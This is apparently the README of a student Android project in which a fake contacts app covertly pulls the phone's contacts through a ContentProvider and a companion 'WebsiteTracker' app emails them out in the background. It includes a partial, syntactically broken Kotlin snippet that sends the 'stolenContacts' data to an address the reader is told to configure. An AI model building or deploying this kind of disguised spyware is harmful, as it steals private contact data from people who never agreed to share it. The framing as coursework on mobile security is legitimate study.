This is a third-year student project for the mobile development subject at the Enseirb-Matmeca of Bordeaux (France).
This project is made up of two applications:
- Contacts: Displays the phone contacts (a seemingly Google Contacts application).
- WebsiteTracker: Provides a sort of "tracker" for websites with dates of visit and ratings of these visited websites.
In background, Contacts exfiltrates the data contact thanks to a ContentProvider, and WebsiteTracker sends an email with this data.
In order to custom the mail address, go to the MainActivity
of the WebTracker application. Then just replace the withMailto()
parameter with your desired mail.
.withSubject("Android project")
.withBody("stolenContacts= ${Gson().toJson(stolenContacts)}")
.withOnSuccessCallback {
Log.i("MainActivity", "Successful mail sending!")
.withOnFailCallback {
Log.e("MainActivity", "Error occurred while sending mail...")
Deborah PEREIRA and Sophie STAN.
Special thanks to yesidlazaro whose library for background mails helped us save much boilerplate code.